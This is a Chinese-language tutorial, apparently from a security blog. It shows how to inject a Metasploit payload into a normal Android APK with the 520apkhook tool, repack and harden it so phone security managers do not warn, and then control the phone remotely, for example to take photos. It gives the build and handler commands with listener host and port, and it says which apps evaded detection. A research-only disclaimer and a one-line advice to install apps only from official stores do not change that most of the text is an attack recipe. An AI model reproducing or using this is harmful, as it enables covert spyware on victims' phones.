MSF+APK注入绕过手机防护上线远控及安全防护建议

1.实验环境

MSF、520_APK_HOOK

2.介绍

将msf生成的payload，注入到一个正常的apk文件中，重新打包后进行加固，bypass手机安全管家的检测。
项目地址: https://github.com/cleverbao/520apkhook
作者: BaoGuo

优点
相比于原始的msf远控，此版本app在进行远控时，被注入的app可以正常运行，原始msf生成的app程序，只在桌面上有一个图标，点击后没有任何app界面。
注入后的app在安装时，手机管家不会有任何安全提示，原始msf生成的app程序，安装时手机管家会有安全警示。
被注入后的app可以正常运行，msf正常在线，继承app的权限
重点说明
本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.
部分被加固过的app无法进行注入，已测试网易系列???，360系列???，腾讯系列❤️，其他的请自行测试。
使用
下载安装所需运行库

安装之后运行

python3 main.py --lhost 192.168.0.109 --lport 1433  -n com.xiachufang_8.1.1_692.apk

结束后就可以加载文件进行监听

msfconsole -r WorkDir/handler.rc    #加载工具下文件，其实就是打包的监听命令

将生成的apk文件在安卓手机进行安装, 即可完成对目标的控制
成功后, 可以在msf中进行远程控制

查看手机信息：

拍照：
打开手机摄像头拍照并保存在指定目录下

注意事项：其他功能自测，其他高级控制权限可能需要手机root
测试结果：光环助手app通过，下厨房app不通过。
防护建议：下载手机应用请到正规的应用市场下载，非必要情况下不要开启root权限。